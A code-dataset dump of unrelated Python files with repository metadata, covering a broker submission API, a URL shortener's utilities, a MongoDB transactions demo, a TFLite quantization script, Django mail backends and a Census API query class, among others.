                df.to_sql(con=self.engine, name='feature_perf_data',
                          if_exists="append", index=False)
            except ValueError as e:
                print(e)
                return MetricsExportResult.FAILURE
        # BUG FIX: SUCCESS used to be returned inside the loop, so only the
        # first record was ever exported (and an empty batch returned None).
        return MetricsExportResult.SUCCESS
    def shutdown(self) -> None:
        """Shuts down the exporter.
        Called when the SDK is shut down. No resources to release here.
        """
33f0d31e3a217367f0357c35df26fe4ef6403f03 | 4,410 | py | Python | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 3 | 2017-03-21T20:03:53.000Z | 2018-05-03T16:27:32.000Z | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 7 | 2017-07-17T10:34:34.000Z | 2018-05-16T14:04:57.000Z | broker/service/api/v10.py | bigsea-ufcg/bigsea-manager | 73235298308f55ae287a595fc1f056fbcc022b12 | [
"Apache-2.0"
] | 10 | 2017-04-17T14:30:27.000Z | 2018-09-04T14:55:11.000Z | # Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from broker.plugins import base as plugin_base
from broker.service import api
from broker.utils.logger import Log
from broker.utils.framework import authorizer
from broker.utils.framework import optimizer
from broker import exceptions as ex
API_LOG = Log("APIv10", "logs/APIv10.log")
submissions = {}
def run_submission(data):
    """
    Validate the payload, optionally authenticate, and start the submission.

    Args:
        data (dict): request payload with 'plugin', 'plugin_info',
            'enable_auth' and, when auth is enabled, 'username'/'password'.
    Returns:
        The id of the started submission.
    Raises:
        ex.BadRequestException: on missing fields or unknown plugin.
        ex.UnauthorizedException: when authentication fails.
    """
    if ('plugin' not in data or 'plugin_info' not in data):
        API_LOG.log("Missing plugin fields in request")
        raise ex.BadRequestException("Missing plugin fields in request")

    if data['enable_auth']:
        if ('username' not in data or 'password' not in data):
            API_LOG.log("Missing plugin fields in request")
            raise ex.BadRequestException("Missing plugin fields in request")

        username = data['username']
        password = data['password']
        authorization = authorizer.get_authorization(api.authorization_url,
                                                     username, password)
        if not authorization['success']:
            API_LOG.log("Unauthorized request")
            raise ex.UnauthorizedException()

    # BUG FIX: the plugin execution used to live in the `else` branch, so a
    # successfully authenticated request returned None and never started the
    # submission. It now runs for both the authenticated and no-auth paths.
    if data['plugin'] not in api.plugins:
        raise ex.BadRequestException()
    plugin = plugin_base.PLUGINS.get_plugin(data['plugin'])
    submission_id, executor = plugin.execute(data['plugin_info'])
    submissions[submission_id] = executor
    return submission_id
def stop_submission(submission_id, data):
    """
    Authenticate the request and return the submission's executor.

    NOTE(review): despite its name, this does not stop the execution yet
    (see the TODO below); it only returns the executor object.

    Args:
        submission_id: id previously returned by run_submission.
        data (dict): request payload carrying 'username' and 'password'.
    Raises:
        ex.BadRequestException: on missing credentials or unknown id.
        ex.UnauthorizedException: when authentication fails.
    """
    if 'username' not in data or 'password' not in data:
        API_LOG.log("Missing parameters in request")
        raise ex.BadRequestException()

    username = data['username']
    password = data['password']
    authorization = authorizer.get_authorization(api.authorization_url,
                                                 username, password)
    if not authorization['success']:
        API_LOG.log("Unauthorized request")
        raise ex.UnauthorizedException()
    else:
        if submission_id not in submissions.keys():
            raise ex.BadRequestException()
        # TODO: Call the executor by submission_id and stop the execution.
        return submissions[submission_id]
def list_submissions():
    """Return {submission_id: {'status': <application state>}} for every
    known submission."""
    return {
        sub_id: {'status': executor.get_application_state()}
        for sub_id, executor in submissions.items()
    }
def submission_status(submission_id):
    """Return state and timing information for one submission.

    Raises:
        ex.BadRequestException: for an unknown submission id.
    """
    if submission_id not in submissions:
        API_LOG.log("Wrong request")
        raise ex.BadRequestException()

    # TODO: Update status of application with more informations
    executor = submissions[submission_id]
    return {
        'status': executor.get_application_state(),
        'execution_time': executor.get_application_execution_time(),
        'start_time': executor.get_application_start_time(),
    }
def submission_log(submission_id):
    """
    Return the execution/stderr/stdout logs of a submission as lists of
    newline-stripped lines.

    Raises:
        ex.BadRequestException: for an unknown submission id.
    """
    if submission_id not in submissions:
        API_LOG.log("Wrong request")
        raise ex.BadRequestException()

    logs = {}
    # Context managers guarantee the files are closed, and the list
    # comprehension replaces the lazy Python-3 `map` objects that the
    # original stored (which are not JSON-serializable downstream).
    for name in ('execution', 'stderr', 'stdout'):
        with open("logs/apps/%s/%s" % (submission_id, name), "r") as log_file:
            logs[name] = [line.replace("\n", "") for line in log_file]
    return logs
| 32.189781 | 76 | 0.65941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,301 | 0.295011 |
33f1df7af6076d426dfa10cdaf7eb926cc35605b | 362 | py | Python | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | 2 | 2021-04-27T09:18:46.000Z | 2021-10-17T03:58:53.000Z | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | null | null | null | Unit_B/chapter10_Lists/sampleCode/makeList.py | noynaert/csc184Handouts | c3e4c8824ee8d16b128abd771a8b5f8a2f01c0de | [
"Unlicense"
] | null | null | null | # creates a list and prints it
# A list literal holding the days of the week, in order.
days = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
# traversing without an index
for day in days:
    print(day)
# traversing with an index
for i in range(len(days)):
    print(f"Day {i} is {days[i]}")
# lists are mutable: replace the element at index 1 in place
days[1] = "Lunes"
print("Day[1] is now ",days[1])
# traverse again to show the updated list
for day in days:
print(day) | 21.294118 | 85 | 0.624309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 195 | 0.538674 |
33f2c47794c2f14e6aec70a212195a2870d2f836 | 826 | py | Python | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 29 | 2021-10-01T09:43:26.000Z | 2022-03-15T10:46:53.000Z | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 15 | 2022-02-04T09:21:43.000Z | 2022-03-31T08:29:00.000Z | cellacdc/models/YeaZ/__init__.py | SchmollerLab/Cell_ACDC | 2be9c0055c3306c4c35da99831f146d8a211baa0 | [
"BSD-3-Clause"
] | 1 | 2022-03-15T02:23:02.000Z | 2022-03-15T02:23:02.000Z | try:
import tensorflow
except ModuleNotFoundError:
pkg_name = 'tensorflow'
import os
import sys
import subprocess
from cellacdc import myutils
cancel = myutils.install_package_msg(pkg_name)
if cancel:
raise ModuleNotFoundError(
f'User aborted {pkg_name} installation'
)
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install', 'tensorflow']
)
# numba requires numpy<1.22 but tensorflow might install higher
# so install numpy less than 1.22 if needed
import numpy
np_version = numpy.__version__.split('.')
np_major, np_minor = [int(v) for v in np_version][:2]
if np_major >= 1 and np_minor >= 22:
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install', '--upgrade', 'numpy<1.22']
)
| 30.592593 | 79 | 0.635593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.279661 |
33f36e64be2e93d23e86bda79bdc0f169b48316e | 1,290 | py | Python | demos/shortify/shortify/utils.py | Ixyk-Wolf/aiohttp-demos | e26ef202e6fd4759f4c77f44cdbdbec482196b41 | [
"Apache-2.0"
] | 649 | 2017-10-27T10:55:59.000Z | 2022-03-29T07:14:09.000Z | demos/shortify/shortify/utils.py | xiaohuanshu/aiohttp-demos | 0d9898eec7e262ed0083159613de5d1ea1e98974 | [
"Apache-2.0"
] | 87 | 2017-10-27T11:12:06.000Z | 2021-08-17T18:36:59.000Z | demos/shortify/shortify/utils.py | xiaohuanshu/aiohttp-demos | 0d9898eec7e262ed0083159613de5d1ea1e98974 | [
"Apache-2.0"
] | 284 | 2017-11-05T13:24:51.000Z | 2022-03-12T03:37:55.000Z | import aioredis
import trafaret as t
import yaml
from aiohttp import web
# Schema of the YAML configuration file: redis connection/pool settings
# plus the host/port the HTTP application binds to.
CONFIG_TRAFARET = t.Dict(
    {
        t.Key('redis'): t.Dict(
            {
                'port': t.Int(),
                'host': t.String(),
                'db': t.Int(),
                'minsize': t.Int(),
                'maxsize': t.Int(),
            }
        ),
        'host': t.IP,
        'port': t.Int(),
    }
)
def load_config(fname):
    """Load and validate the YAML configuration file.

    Args:
        fname: path to the YAML configuration file.
    Returns:
        The configuration mapping, validated against CONFIG_TRAFARET.
    Raises:
        trafaret.DataError: if the file does not match the schema.
    """
    with open(fname, 'rt') as f:
        # SECURITY FIX: yaml.load without an explicit Loader can construct
        # arbitrary Python objects from untrusted input (and is deprecated);
        # safe_load restricts parsing to plain data types.
        data = yaml.safe_load(f)
    return CONFIG_TRAFARET.check(data)
async def init_redis(conf, loop):
    """Create and return an aioredis connection pool.

    Args:
        conf: the validated 'redis' section of the configuration
            (host, port, minsize, maxsize).
        loop: the asyncio event loop the pool is bound to.
    """
    pool = await aioredis.create_redis_pool(
        (conf['host'], conf['port']),
        minsize=conf['minsize'],
        maxsize=conf['maxsize'],
        loop=loop,
    )
    return pool
# Base-56 alphabet for short URL ids: visually ambiguous characters
# (0, 1, I, O, l, o) are left out.
CHARS = "abcdefghijkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789"


def encode(num, alphabet=CHARS):
    """Encode a non-negative integer as a string over *alphabet*.

    Zero encodes to the alphabet's first character; larger values are
    written most-significant digit first.
    """
    base = len(alphabet)
    digits = []
    while True:
        num, rem = divmod(num, base)
        digits.append(alphabet[rem])
        if not num:
            break
    return ''.join(reversed(digits))
# Request schema: the payload must carry a valid 'url' field.
ShortifyRequest = t.Dict({t.Key('url'): t.URL})


def fetch_url(data):
    """Validate the request payload and return the URL it carries.

    Raises:
        web.HTTPBadRequest: when the payload does not match ShortifyRequest.
    """
    try:
        data = ShortifyRequest(data)
    except t.DataError:
        # BUG FIX: aiohttp HTTP exceptions take keyword-only arguments, so
        # the original positional call raised TypeError instead of the
        # intended 400 response.
        raise web.HTTPBadRequest(text='URL is not valid')
    return data['url']
| 20.15625 | 66 | 0.54186 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.172868 | 175 | 0.135659 |
33f382e01faf075b62dec4b248210e8307fb81c2 | 1,667 | py | Python | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | anonymizers/location_anonymizer.py | zacharywilkins/anonymizac | c38ce30413f89f49b8e90cdca13c3739674d7b64 | [
"MIT"
] | null | null | null | from anonymizers.base_anonymizer import Anonymizer
class LocationAnonymizer(Anonymizer):
    """Replace location proper nouns (e.g. "in Paris") with a [LOCATION] tag."""
    anonymization_type = "location"
    # Prepositions that typically introduce a location phrase.
    location_prepositions = ["in", "at"]
    def __init__(self):
        self.initialize_spacy_model()
    def is_location(self, index: int) -> bool:
        """True when the token just before *index* is a location preposition."""
        if self.parsed_user_input[index - 1][0].lower() in self.location_prepositions:
            return True
        else:
            return False
    def scrub(self, user_input: str) -> str:
        """Return *user_input* with detected location tokens anonymized.

        Assumes parse_user_input yields (text, pos, dep) triples — confirm
        against the Anonymizer base class.
        """
        self.parsed_user_input = self.parse_user_input(user_input)
        if 'PROPN' not in self.all_pos:
            return user_input # For improved speed of implementation
        anonymized_user_input_list = []
        for index, parsed_word in enumerate(self.parsed_user_input):
            word_text = parsed_word[0]
            word_pos = parsed_word[1]
            if index != 0 and word_pos == 'PROPN':
                previous_word = self.parsed_user_input[index - 1]
                # prev_word_anonymized was set by the previous iteration
                # (index 0 always initialises it); it lets multi-word
                # locations like "in New York" stay anonymized token by token.
                if previous_word[2] == 'prep' or prev_word_anonymized:
                    if self.is_location(index) or (self.is_location(index - 1) and prev_word_anonymized):
                        anonymized_word = "[" + self.anonymization_type.upper() + "]"
                        anonymized_user_input_list.append(anonymized_word)
                        prev_word_anonymized = True
                        continue
            anonymized_user_input_list.append(word_text)
            prev_word_anonymized = False
        anonymized_user_input = " ".join(anonymized_user_input_list)
        anonymized_user_input = self.normalize_user_input(anonymized_user_input)
return anonymized_user_input | 38.767442 | 105 | 0.636473 | 1,614 | 0.968206 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.05099 |
33f77890d77ebb7d721abd90ddbfe421eb63ecdb | 5,838 | py | Python | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 18 | 2019-06-11T13:35:26.000Z | 2021-08-30T22:28:32.000Z | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 1 | 2019-10-10T12:27:44.000Z | 2019-10-10T12:27:44.000Z | Chapter05/python/init_data.py | iamssxn/PacktPublishingb | caadbf997f7f7a27601424b602fc554e7be931d4 | [
"MIT"
] | 8 | 2019-07-24T03:25:18.000Z | 2021-12-10T07:02:38.000Z | from pymongo import MongoClient
import json
class InitData:
    """Seed the mongo_bank.accounts collection and demonstrate MongoDB
    multi-document transactions (commit, abort, session visibility)."""
    def __init__(self):
        """Connect to MongoDB, reseed the accounts collection and run the
        demo transfers."""
        self.client = MongoClient('localhost', 27017, w='majority')
        self.db = self.client.mongo_bank
        self.accounts = self.db.accounts
        # drop data from accounts collection every time to start from a clean slate
        self.db.drop_collection('accounts')
        init_data = InitData.load_data(self)
        self.insert_data(init_data)
        #alex=100, mary=50
        self.tx_transfer_err('1', '2', 300)
        # alex=100, mary=50
        self.tx_transfer_err('1', '2', 90)
        # alex=10, mary=140
        # alex=70, mary=80
        # self.tx_transfer_err('2', '1', 20)
        # alex=90, mary=60
        # self.tx_transfer_err_ses('2', '1', 200)
    @staticmethod
    def load_data(self):
        """Read one JSON document per line from init_data.json."""
        ret = []
        with open('init_data.json', 'r') as f:
            for line in f:
                ret.append(json.loads(line))
        return ret
    def insert_data(self, data):
        """Insert each seed document into its target collection."""
        for document in data:
            # breakpoint()
            collection_name = document['collection']
            account_id = document['account_id']
            account_name = document['account_name']
            account_balance = document['account_balance']
            self.db[collection_name].insert_one({'account_id': account_id, 'name': account_name, 'balance': account_balance})
    # we are updating outside of a tx
    def transfer(self, source_account, target_account, value):
        """Transfer inside a session but update OUTSIDE the transaction,
        then roll back manually when a balance goes negative."""
        print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
        with self.client.start_session() as ses:
            ses.start_transaction()
            self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} })
            self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} })
            updated_source_balance = self.accounts.find_one({'account_id': source_account})['balance']
            updated_target_balance = self.accounts.find_one({'account_id': target_account})['balance']
            if updated_source_balance < 0 or updated_target_balance < 0:
                ses.abort_transaction()
            else:
                ses.commit_transaction()
    # transfer using a tx
    def tx_transfer(self, source_account, target_account, value):
        """Unconditional transfer: both updates run in the transaction and
        are always committed (no balance validation)."""
        print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
        with self.client.start_session() as ses:
            ses.start_transaction()
            self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} }, session=ses)
            self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} }, session=ses)
            ses.commit_transaction()
    # validating errors, not using the tx session
    def tx_transfer_err(self, source_account, target_account, value):
        """Transactional transfer validated WITHOUT the session: the reads
        cannot see the in-transaction updates."""
        print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
        with self.client.start_session() as ses:
            ses.start_transaction()
            res = self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value*(-1)} }, session=ses)
            res2 = self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value} }, session=ses)
            error_tx = self.__validate_transfer(source_account, target_account)
            if error_tx['status'] == True:
                print(f"cant transfer {value} Hypnotons from {source_account} ({error_tx['s_bal']}) to {target_account} ({error_tx['t_bal']})")
                ses.abort_transaction()
            else:
                ses.commit_transaction()
    # validating errors, using the tx session
    def tx_transfer_err_ses(self, source_account, target_account, value):
        """Transactional transfer validated WITH the session: the reads do
        see the in-transaction updates."""
        print(f'transferring {value} Hypnotons from {source_account} to {target_account}')
        with self.client.start_session() as ses:
            ses.start_transaction()
            res = self.accounts.update_one({'account_id': source_account}, {'$inc': {'balance': value * (-1)}},
                                           session=ses)
            res2 = self.accounts.update_one({'account_id': target_account}, {'$inc': {'balance': value}},
                                           session=ses)
            error_tx = self.__validate_transfer_ses(source_account, target_account, ses)
            if error_tx['status'] == True:
                print(f"cant transfer {value} Hypnotons from {source_account} ({error_tx['s_bal']}) to {target_account} ({error_tx['t_bal']})")
                ses.abort_transaction()
            else:
                ses.commit_transaction()
    # we are outside the transaction so we cant see the updated values
    def __validate_transfer(self, source_account, target_account):
        """Flag the transfer as erroneous when either balance is negative."""
        source_balance = self.accounts.find_one({'account_id': source_account})['balance']
        target_balance = self.accounts.find_one({'account_id': target_account})['balance']
        if source_balance < 0 or target_balance < 0:
            return {'status': True, 's_bal': source_balance, 't_bal': target_balance}
        else:
            return {'status': False}
    # we are passing the session value so that we can view the updated values
    def __validate_transfer_ses(self, source_account, target_account, ses):
        """Same check as __validate_transfer, but reading within *ses*."""
        source_balance = self.accounts.find_one({'account_id': source_account}, session=ses)['balance']
        target_balance = self.accounts.find_one({'account_id': target_account}, session=ses)['balance']
        if source_balance < 0 or target_balance < 0:
            return {'status': True, 's_bal': source_balance, 't_bal': target_balance}
        else:
            return {'status': False}
def main():
    # Instantiating InitData seeds the database and runs the demo transfers.
    InitData()
if __name__ == '__main__':
main() | 46.704 | 143 | 0.626242 | 5,726 | 0.980815 | 0 | 0 | 193 | 0.033059 | 0 | 0 | 1,649 | 0.28246 |
33f795c2e3982a688bb7022c730690391c8e4132 | 532 | py | Python | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 1,529 | 2019-12-11T13:36:23.000Z | 2022-03-31T18:38:27.000Z | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 200 | 2020-01-06T09:24:42.000Z | 2022-03-31T17:29:08.000Z | 067_MiDaS/01_float32/07_float16_quantization.py | IgiArdiyanto/PINTO_model_zoo | 9247b56a7dff37f28a8a7822a7ef4dd9adf7234d | [
"MIT"
] | 288 | 2020-02-21T14:56:02.000Z | 2022-03-30T03:00:35.000Z | ### tensorflow==2.3.1
import tensorflow as tf
# Float16 Quantization - Input/Output=float32
height = 384
width = 384
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model')
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
tflite_model = converter.convert()
with open('midas_{}x{}_float16_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Float16 Quantization complete! - midas_{}x{}_float16_quant.tflite'.format(height, width))
| 35.466667 | 96 | 0.770677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.345865 |
33f7daec8520bf61c9a9ff557667fd5b5759236d | 2,598 | py | Python | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 3 | 2020-08-03T19:25:44.000Z | 2021-06-27T22:25:55.000Z | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | null | null | null | experiments/e2_multi_directional_model_comparison/file_naming/rules/single_target_tree_rule_naming.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 2 | 2020-08-07T22:54:28.000Z | 2021-02-18T06:11:01.000Z | import os
from experiments.file_naming.single_target_classifier_indicator import SingleTargetClassifierIndicator
from project_info import project_dir
def get_single_target_tree_rule_dir() -> str:
    """Return (creating it if necessary) the directory that stores
    single-target tree-rule models."""
    mcars_dir: str = os.path.join(project_dir,
                                  'models',
                                  'single_target_tree_rules')
    # exist_ok=True replaces the racy exists()/makedirs() pair: another
    # process creating the directory in between no longer raises.
    os.makedirs(mcars_dir, exist_ok=True)
    return mcars_dir
def get_single_target_tree_rules_relative_file_name_without_extension(
        dataset_name: str, fold_i: int,
        target_attribute: str,
        classifier_indicator: SingleTargetClassifierIndicator,
        nb_of_trees_per_model: int,
        min_support: float,
        max_depth: int
) -> str:
    """Build the file stem (no extension) encoding dataset, fold, target,
    classifier kind and the tree hyper-parameters."""
    prefix = "{}{}_{}_{}".format(
        dataset_name, fold_i, target_attribute, str(classifier_indicator.value))
    suffix = "_{}trees_{}supp_{}depth".format(
        nb_of_trees_per_model, min_support, max_depth)
    return prefix + suffix
def get_single_target_tree_rules_abs_file_name(
        dataset_name: str, fold_i: int,
        target_attribute: str,
        classifier_indicator: SingleTargetClassifierIndicator,
        nb_of_trees_per_model: int,
        min_support: float,
        max_depth: int,
):
    """Absolute path of the gzipped JSON file holding the extracted rules."""
    rules_dir = get_single_target_tree_rule_dir()
    stem = get_single_target_tree_rules_relative_file_name_without_extension(
        dataset_name=dataset_name, fold_i=fold_i,
        target_attribute=target_attribute,
        classifier_indicator=classifier_indicator,
        nb_of_trees_per_model=nb_of_trees_per_model,
        min_support=min_support, max_depth=max_depth
    )
    return os.path.join(rules_dir, stem + ".json.gz")
def get_single_target_tree_rules_gen_timing_info_abs_file_name(
        dataset_name: str, fold_i: int,
        target_attribute: str,
        classifier_indicator: SingleTargetClassifierIndicator,
        nb_of_trees_per_model: int,
        min_support: float,
        max_depth: int,
):
    """Absolute path of the gzipped JSON file holding rule-generation
    timing information."""
    rules_dir = get_single_target_tree_rule_dir()
    stem = get_single_target_tree_rules_relative_file_name_without_extension(
        dataset_name=dataset_name, fold_i=fold_i,
        target_attribute=target_attribute,
        classifier_indicator=classifier_indicator,
        nb_of_trees_per_model=nb_of_trees_per_model,
        min_support=min_support, max_depth=max_depth
    )
    return os.path.join(rules_dir, stem + "_timings.json.gz")
| 36.591549 | 102 | 0.734411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 252 | 0.096998 |
33f87e0f533a0c640931bd3fd8c3d5fa7efb74b8 | 1,291 | py | Python | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | null | null | null | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | 5 | 2019-03-04T16:17:30.000Z | 2019-05-04T08:34:19.000Z | devconf/ast/mixins/expression.py | everclear72216/ucapi | 7f5afbee6b3b772086d33c2ee37e85e65af61697 | [
"MIT"
] | null | null | null | import ast.value
import ast.qualifier
import ast.mixins.node
import ast.mixins.typed
import ast.mixins.qualified
class LValueExpression(ast.mixins.node.Node, ast.mixins.typed.Typed, ast.mixins.qualified.Qualified):
    """An assignable (l-value) expression node holding an optional value.

    NOTE(review): ``ast`` here is the project's own package tree, which
    shadows the stdlib ``ast`` module.
    """
    def __init__(self):
        super().__init__()
        # NOTE(review): the annotation `ast.value.Value or None` evaluates
        # to just `ast.value.Value`; `Optional[...]` is what was meant.
        self.__value: ast.value.Value or None = None
    def get_value(self) -> ast.value.Value:
        """Return the stored value, falling back to the default when unset."""
        assert isinstance(self.__value, ast.value.Value) or self.has_default()
        if self.__value is None:
            assert self.has_default()
            value = self.get_default()
            assert isinstance(value, ast.value.Value)
            return value
        else:
            assert isinstance(self.__value, ast.value.Value)
            return self.__value
    def set_value(self, value: ast.value.Value) -> None:
        """Store *value*, letting cooperating mixins observe it via super()."""
        assert isinstance(value, ast.value.Value)
        if hasattr(super(), 'set_value'):
            super().set_value(value)
        self.__value = value
    def has_default(self) -> bool:
        # Subclasses override to advertise that a default value exists.
        return False
    def get_default(self) -> ast.value.Value or None:
        # Subclasses override to supply the default value.
        return None
    def evaluate(self):
        # Hook for subclasses; the base expression evaluates to nothing.
        pass
class RValueExpression(LValueExpression):
    """A read-only (r-value) expression: an l-value marked const."""
    def __init__(self):
        super().__init__()
        self.add_qualifier(ast.qualifier.ConstQualifier())
| 23.907407 | 101 | 0.642912 | 1,171 | 0.907049 | 0 | 0 | 0 | 0 | 0 | 0 | 11 | 0.008521 |
33f916f81fdbf9453883ef52533bcab168ba5c0e | 911 | py | Python | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | 1 | 2019-03-23T08:53:53.000Z | 2019-03-23T08:53:53.000Z | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | null | null | null | todo/mail/delivery.py | sweetlearn/django-todo | 70cac8b4e926794126f831a766a1461fa5eae399 | [
"BSD-3-Clause"
] | null | null | null | import importlib
def _declare_backend(backend_path):
backend_path = backend_path.split('.')
backend_module_name = '.'.join(backend_path[:-1])
class_name = backend_path[-1]
def backend(*args, headers={}, from_address=None, **kwargs):
def _backend():
backend_module = importlib.import_module(backend_module_name)
backend = getattr(backend_module, class_name)
return backend(*args, **kwargs)
if from_address is None:
raise ValueError("missing from_address")
_backend.from_address = from_address
_backend.headers = headers
return _backend
return backend
smtp_backend = _declare_backend('django.core.mail.backends.smtp.EmailBackend')
console_backend = _declare_backend('django.core.mail.backends.console.EmailBackend')
locmem_backend = _declare_backend('django.core.mail.backends.locmem.EmailBackend')
| 35.038462 | 84 | 0.710209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 168 | 0.184413 |
33f92dee740cb042eaee2c3fec74d44c25ed57fb | 795 | py | Python | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | models.py | 12DReflections/cab_trips | fc85ebd44056b1a340705164912d2f8c700415df | [
"BSD-Source-Code"
] | null | null | null | from database import Base
from sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime, Float
from sqlalchemy.types import DateTime
from flask import Flask, request, jsonify, make_response
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Medallions(Base):
    """SQLAlchemy ORM model for one taxi (medallion) trip record."""
    __tablename__ = 'medallions'
    id = Column(Integer, primary_key=True)  # surrogate primary key
    medallion = Column(String(50))  # taxi medallion identifier
    hack_license = Column(String(20))  # driver licence identifier
    vendor_id = Column(String(20))
    rate_code = Column(String(20))
    store_and_fwd_flag = Column(String(20))
    pickup_datetime = Column(DateTime)
    dropoff_datetime = Column(DateTime)
    passenger_count = Column(Integer)
    trip_time_in_secs = Column(Integer)
    trip_distance = Column(Float)  # units not specified here — confirm upstream
| 25.645161 | 84 | 0.78239 | 444 | 0.558491 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.055346 |
33f98f80566e3cf8e0e71b7f6386a2651df6888b | 4,131 | py | Python | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
] | null | null | null | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
] | null | null | null | census_api/census_query.py | chrispyles/census_api | bb543517e4226a075b28cc3d10f7a40403f79337 | [
"BSD-3-Clause"
] | null | null | null | #####################################
##### Class to Query Census API #####
#####################################
import requests
import json
import pandas as pd
import datascience as ds
from .utils import *
class CensusQuery:
    """Object to query US Census API"""

    # Dataset alias -> URL path fragment of the Census API endpoint.
    _url_endings = {
        "acs5": "acs/acs5",
        "acs1": "acs/acs1",
        "sf1": "dec/sf1"
    }

    # Friendly names for cryptic Census variable codes.
    _variable_aliases = {
        "acs5": {
            "total_population": "B00001_001E",
        }
    }

    def __init__(self, api_key, dataset, year=None, out="pd"):
        """
        Initializes the CensusQuery object to start API requests
        Args:
        * api_key (`str`): User's API key
        * dataset (`str`): The dataset to be queried; `"acs5"`, `"acs1"`, or `"sf1"`
        Kwargs:
        * year (`int`): The year to query data for; can be overwritten in `CensusQuery.query`
        * out (`str`): Whether output should be `pandas.DataFrame` or `datascience.tables.Table`; `"pd"` or `"ds"`
        Returns:
        * `CensusQuery`. The `CensusQuery` instance to be used to query the API
        """
        assert dataset in CensusQuery._url_endings, "{} is not a valid dataset".format(dataset)
        self._dataset = CensusQuery._url_endings[dataset]
        if year is not None:
            assert isinstance(year, int), "{} not a valid year".format(year)
